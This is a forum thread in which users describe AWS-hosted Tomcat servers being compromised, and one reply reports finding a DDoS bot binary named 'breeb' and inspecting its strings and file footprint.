: AWS EBS Tomcat instance being hacked I'm using AWS EBS instances with tomcat for my java web application. But somehow some guy manages to hack into my instances and all I can see are these

@Gail5422790

* THREAD TAKEN TO AWS FORUMS *
forums.aws.amazon.com/thread.jspa?threadID=227061&tstart=0
* THREAD TAKEN TO AWS FORUMS *



I had the same problem last week:

My amazon server was somehow compromised. I received an abuse report from amazon stating my server was being used in a DDOS attack on a website.

When I logged in I found an application /usr/share/tomcat7/breeb was running in memory. I expect there is a weakness in tomcat 7 which means a remote user is able to upload a spam client to my server and execute it as the tomcat user. Very worrying.

Looks to me like the ‘breeb’ application is written in c++ and has the following footprint

-rwxrwxrwx 1 tomcat tomcat 1223123 Nov 7 23:54 breeb
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.1
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.2
-rw-r--r-- 1 tomcat tomcat 1223123 Nov 7 23:54 breeb.3


Some of the c++ classes are a bit of a giveaway:

[ec2-user tmp]$ strings breeb | grep .cpp
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
ThreadDoFun.cpp
...


Googling "linux backdoor 1223123" which is the bytesize of the spam client, brings up a lot of virus alerts.

Other ‘strings’ in the compiled breeb application include a large list of IP addresses, they are all Chinese and feature in a lot of malware reports.

Cant seem to get any recognition of this issue on any of the forums, I've since rebuilt the server but with tomcat8 and been running for a few days without problems... Would be nice to know what the attack vector was.

Vote Up Vote Down